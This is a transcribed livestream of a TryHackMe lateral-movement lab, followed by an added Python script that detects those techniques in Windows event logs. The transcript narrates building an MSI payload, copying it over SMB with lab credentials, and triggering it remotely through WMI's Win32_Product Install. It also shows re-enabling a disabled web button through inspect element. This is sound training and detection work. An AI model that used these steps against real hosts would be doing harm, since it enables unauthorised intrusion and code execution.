lateral movement l port looks like we're changing it up four four four five dash f file type msi and we will call it hacksmarter.msi i'm just gonna set this as well that's what we set it to right yep oh wait no we need to change the payload change that payload i made that mistake and had a running um payload that 
i couldn't use anymore so it's very annoying yeah i caught that right right when i hit run make sure i type that right yeah there we go okay we'll copy the payload using smb again there is our hex smutter.msi we'll copy the payload using sm smb or any other method available so we're putting the admin share again so let's just do smb client dash c put packed smarter dot msi dash u we're using t1 kareen waters dash w z a dot try hack me tryhackme.com and then i'm gonna specify the ip again just because that seems to work better 10.200.80.201 and i believe it was just admin or something let's double check here we go yeah oh slightly wrong there admin like that and then it's gonna take the password there but it's gonna prompt us again dot 1994 since we are cop maybe i did something wrong there maybe i'm typing the ip wrong oh do my network break 10.200.80 just hit refresh oh nate network might have stopped i look at that extend timer yeah so just refresh it quickly then the start button will be available again i think you might have pricked it now by clicking extend when the network was flying let's see we'll just see what happens i'll give it a second i don't know if it's gonna work but what you can do is you can try some lead hacking by doing inspect elements and just enabling the start button and trying to press it and see if that will start your network i don't know if it actually works if you press like extend and then after sort of the network has stopped it's something that the front-end developers need to fix because it needs to update your user interface to show you that the network has stopped which i don't think it does sure i mean so and i can't reset it can i because you need five votes to reset it sadly yes this is definitely a brick on the on the front quickly just to inspect elements on that button i think i saw that disabled liner there that you can just remove and see what i happens it's like the yeah just double click that one and delete that inside 
thing let's enter and i'll press it okay your network starting let's let's hope it happens that's fantastic i never would have thought to try that at all we'll give it some time to to do its thing you can even just run a ping while we wait and i guess what i could do is we have a few a little bit of time before our next five minute break but this might take five minutes or so to launch up so we're gonna take an early five minute break i'll come back in five minutes and we'll see where things are at it's actually almost midnight my time when i when i call it call it a day but we'll see if we can make it through this next part so i'm gonna take a quick five minute break i'll come back in five minutes and we will see where things are at so i shall be right back [Music] do [Music] so so my all right what is up everyone i am back after breaking my network i just think it still might be broken let's see just quickly run a end map of that host um instead of a ping i don't know if there might be a firewall that prevents the rest of it and you just do like um oh yeah dashby uh yeah but dash b for port 22. 
okay yeah it's finding it open so yeah that lead hack did actually work that is awesome and we have to get signed back in jenna it looks like well we can we can try this first thought we were trying before here we go because this should still work hey okay let's go and throw this to the side grab this we'll go like that i'm guessing we have to sign in as jenna so let's well we could sign in all right we're not taking a short break we're gonna we just took our short break scroll back down to where i was at so we copied it to our admin share we start a handler to handle that which i did do that let's start wmi session so we're gonna start up powershell so we're going to ssh jenna.field.thmgmp2dojacme.com income 1982 all right get powershell open and now we're just specifying everything that was up there so username it's going to be t1 caring.waters that password is going to be corrine 1994. see if i mess up the syntax as i type it secure password equals convert to secure string password as plain attacks force so far so good new case sensitivity doesn't really matter system dash management dash automation dot ps4 credential username secure password equals new cim session option protocol that just looked wrong to me calm session equals new cim session computer name so i'm going to grab the ip again 10.200.80.201. 
credential our variable that we created session option other variable created air action stop if i really typed all of that without a typo i'm going to be in awe we then invoke the install method from the win32 product class to trigger the payload very interesting let's give it some time to do its thing i got no errors that's that's amazing especially at midnight invoke cim method cim session session class name when 32 product method name install arguments package location equals c windows called it hack smarter.msi i believe options equals make sure i have the spaces correct here i think i do user space equals space false so we're not going to install on all users look at my syntax there as a result you used to see a connection okay did we trigger right hey hey doing good so far moving with wmi for fun heck yeah what's this next one look like looks like a lot okay well how much have we completed so far we done four tasks we got four left look at that i think that's a perfect spot to end part one and uh we'll finish up part two tomorrow it is midnight where i am at so for those of you watching twitch discord youtube hey thank you seriously for hanging out amoeba man thank you again for joining uh for those of you who follow us a mutman's been on quite a few helping us explain things and we are going to on uh this confuses me when i look at my clock on uh midnight it's kind of tuesday for me but on thursday so not tomorrow night when i stream tomorrow night i will finish this room hopefully we'll do part two and finish this room up but then on thursday evening the plan is that amoeba man is going to join us and he's going to walk us through spinning up uh our own active directory network for lab do i have that right amoeba man any details you want to add there to my explanation no i'm basically just spinning up active directory labs using flagrant which is used for infrastructure as code so it's something i use uh tryhackme and my day job as well because often we 
need network due to tests or these other things so all of these networks were created by vagrant so you would have noticed in the networks there's a vagrant user on on all of those machines and that's basically the provisioner which is creating those machines for you and once you sort of like have a baseline vagrant thing running um you can run vagrant up and then leave it for for quite some time and then it's just going to boot up your entire active directory network for you so it's a nice way to create sort of like baseline templates for yourself that you can then use to to modify to do whatever you want that is awesome man it's gonna be exciting to learn learned that i have like a very small ad lab i made up with virtualbox but it it was a lot of just manual labor and time to do that so um yeah that'll be fun so for those of you watching join back thursday evening uh around 10 p.m central time you can do the time translation and we're gonna spend uh that that stream doing that and of course as usual it'll be recorded after the fact on twitch as well as on youtube and i'll spam it out to the best of my ability elsewhere so once again for all the those of you watching thank you again for hanging out thank you for sticking through and we will do part two tomorrow evening same place same time i'll see you guys then
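As an added example (not from the stream or the TryHackMe room), here is the defender's view of the three techniques walked through above: a small Python scan over constructed Windows event records that flags the NewCredentials logon that runas /netonly leaves on the source host, a service registered from a binary sitting directly in %windir%, and a process spawned by WmiPrvSE.exe on the target. Event field names follow the standard Security/System/Sysmon exports; the hostnames, service names, paths and every sample record are constructed for this example.

```python
"""Defender-side checks for the lateral-movement techniques in the stream:
runas /netonly, a service created remotely with sc.exe, and processes or MSI
installs launched through WMI (Win32_Process / Win32_Product). Input is a
list of flattened Windows event records (one dict per event) using standard
Security (4624, 4688), System (7045) and Sysmon (1) field names."""
from dataclasses import dataclass
from typing import List, Optional
import ntpath

# Directories where a newly installed service binary is expected to live.
NORMAL_SERVICE_DIRS = (r"c:\windows\system32", r"c:\program files",
                       r"c:\program files (x86)")


@dataclass(frozen=True)
class Finding:
    rule: str
    host: str
    detail: str


def _norm(path: str) -> str:
    """Lower-case, strip quotes and expand %windir% so path checks are uniform."""
    return path.strip().strip('"').lower().replace("%windir%", r"c:\windows")


def check_netonly_logon(ev: dict) -> Optional[Finding]:
    """Security 4624 with LogonType 9 (NewCredentials) is what runas /netonly
    leaves on the *source* host: the process keeps the caller's local token and
    only network authentication uses the new credentials, which is also why a
    wrong password is not rejected up front (as noted in the stream)."""
    if ev.get("EventID") == 4624 and str(ev.get("LogonType")) == "9":
        return Finding("netonly-logon", ev["Computer"],
                       f"NewCredentials logon by {ev.get('SubjectUserName')} "
                       f"via {ev.get('ProcessName')}")
    return None


def check_service_install(ev: dict) -> Optional[Finding]:
    """System 7045 (service installed). Flag a binary outside the usual service
    directories, e.g. dropped into %windir% over ADMIN$ and registered with sc.exe."""
    if ev.get("EventID") != 7045:
        return None
    exe = _norm(ev.get("ImagePath", "")).split(" ")[0]
    directory = ntpath.dirname(exe)
    if directory and not directory.startswith(NORMAL_SERVICE_DIRS):
        return Finding("service-install-unusual-path", ev["Computer"],
                       f"service {ev.get('ServiceName')} -> {exe} (start="
                       f"{ev.get('StartType')}, account={ev.get('AccountName')})")
    return None


def check_wmi_child(ev: dict) -> Optional[Finding]:
    """Sysmon 1 / Security 4688: processes started via Win32_Process.Create or
    Win32_Product.Install run on the target as children of WmiPrvSE.exe."""
    if ev.get("EventID") not in (1, 4688):
        return None
    if ntpath.basename(_norm(ev.get("ParentImage", ""))) == "wmiprvse.exe":
        child = ntpath.basename(_norm(ev.get("Image", "")))
        return Finding("wmi-spawned-process", ev["Computer"],
                       f"{child} spawned by WmiPrvSE.exe: {ev.get('CommandLine')}")
    return None


RULES = (check_netonly_logon, check_service_install, check_wmi_child)


def scan(events: List[dict]) -> List[Finding]:
    """Run every rule over every event; hits are returned in event order."""
    return [hit for ev in events for rule in RULES if (hit := rule(ev)) is not None]


# Constructed sample records: one benign service install, then the three techniques.
SAMPLE_EVENTS = [
    {"EventID": 7045, "Computer": "THMIIS", "ServiceName": "W3SVC",
     "ImagePath": r"%windir%\System32\svchost.exe -k iissvcs",
     "StartType": "auto start", "AccountName": "LocalSystem"},
    {"EventID": 4624, "Computer": "THMJMP2", "LogonType": "9",
     "SubjectUserName": "jenna.field", "ProcessName": r"C:\Windows\System32\runas.exe"},
    {"EventID": 7045, "Computer": "THMIIS", "ServiceName": "tylerwins3249",
     "ImagePath": r"%windir%\hacksmarter.exe", "StartType": "auto start",
     "AccountName": "LocalSystem"},
    {"EventID": 1, "Computer": "THMIIS", "Image": r"C:\Windows\System32\msiexec.exe",
     "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "CommandLine": r"msiexec.exe /i C:\Windows\hacksmarter.msi /quiet"},
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f.rule}] {f.host}: {f.detail}")
```

The W3SVC record is there as the negative case: a service whose binary lives under System32 produces no finding, while the dropped %windir%\hacksmarter.exe does.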
Info
Channel: Tyler Ramsbey
Views: 11,728
Keywords: lateral movement and pivoting, tryhackme, lateral movement, active directory hacking, oscp study, oscp, tyler ramsbey, hack_smarter, offensive security, pentesting, cybersecurity
Id: basSfhSJW0Y
Length: 88min 5sec (5285 seconds)
Published: Wed Jun 29 2022